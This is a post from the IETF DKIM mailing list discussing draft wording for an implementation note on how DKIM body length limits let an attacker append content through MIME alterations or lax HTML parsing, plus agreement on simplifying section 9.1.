I'd like to leave in MIME and HTML exploits as examples if people agree that
wouldn't be harmful, such as this updated text in 4.4.5:
<t>INFORMATIVE IMPLEMENTATION NOTE: Using body length
limits enables an attack in which an attacker modifies a
message to include content that solely benefits the
attacker. It is possible for the appended content to
completely replace the original content in the end
recipient's eyes, such as via alterations to the MIME
structure or exploiting lax HTML parsing in the MUA,
and to defeat duplicate message detection algorithms.
To avoid this attack, signers should be wary of using
this tag, and verifiers might wish to ignore the tag,
{DKIM 2} perhaps based on other criteria.</t>
I'm worried that without this, a neophyte won't see what the attack is.
I'm fine with the proposed simplification of 9.1, and I think at least Dave and
JD have +1'd it already as well.
Is that acceptable?
_______________________________________________
NOTE WELL: This list operates according to
http://mipassoc.org/dkim/ietf-list-rules.html